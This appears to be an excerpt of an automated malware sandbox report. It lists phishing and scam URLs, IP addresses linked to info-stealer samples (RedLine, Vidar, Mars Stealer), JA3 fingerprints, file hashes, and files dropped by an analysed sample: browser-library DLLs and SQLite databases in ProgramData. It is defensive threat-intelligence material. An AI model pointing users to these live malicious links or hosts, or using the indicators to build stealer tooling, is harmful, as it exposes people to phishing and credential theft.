	https://sgusa3.sharepoint.com/:f:/s/ESSExternalPortal/Ep2vdkaY-f5IstEbB83tCgcBs_cKepSlCQGqJ92Z-gw5uQ?xsdata=MDV8MDJ8bW1leWVyc0BidXJuc21jZC5jb218OWZhZmYwM2M2MThiNGMzMmI4NjYwOGRjNjYyZjk3YWR8YmZiYjlhMmI2ZDk5NGU3OGIzYzc5NTAwNWQ1NTVjOGJ8MHwwfDYzODQ5NzYwMTc5ODA4MjQwNHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=bngyZ1FROWtWMzlEWlhCYjlhRkpvV0dHeHJKK2JGZG9MckVVMGFjcHpYYz0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	https://qdorbb80j410g85n.azureedge.net/010au/	Get hash	malicious	TechSupportScam	Browse	13.107.213.70
	https://worker-curly-silence-18d1.pistisarte.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
NADYMSS-ASRU	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	169.150.236.99 173.222.162.32
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	169.150.236.99 173.222.162.32
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse	169.150.236.99 173.222.162.32
	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	169.150.236.99 173.222.162.32
	https://htceram.com/	Get hash	malicious	Unknown	Browse	169.150.236.99 173.222.162.32
	https://www.steampowered.solutions/	Get hash	malicious	Unknown	Browse	169.150.236.99 173.222.162.32
	https://wall.page/jcw7sZ	Get hash	malicious	Unknown	Browse	169.150.236.99 173.222.162.32
	PdfConverters.exe	Get hash	malicious	Unknown	Browse	169.150.236.99 173.222.162.32
	https://pub-9d425aa9335c4307a502c0721d499bdd.r2.dev/officemm.html	Get hash	malicious	HTMLPhisher	Browse	169.150.236.99 173.222.162.32
	SecuriteInfo.com.Heuristic.HEUR.AGEN.1362051.12742.9223.exe	Get hash	malicious	Unknown	Browse	169.150.236.99 173.222.162.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEHIECAFCGDBFHIDBKFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BQJUWOYRTO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\ProgramData\CGHCGIIDGDAKFIEBKFCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKFCGIJKJKFHIDHIIIEBGCBFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGDBAKKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\EEGWXUHVUG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\ProgramData\EEGWXUHVUG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	false
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\ProgramData\FCFIJEBF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFBFBAEBKJKEBGCAEHCFCBAEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HTAGVDFUIE.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u3bs.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQ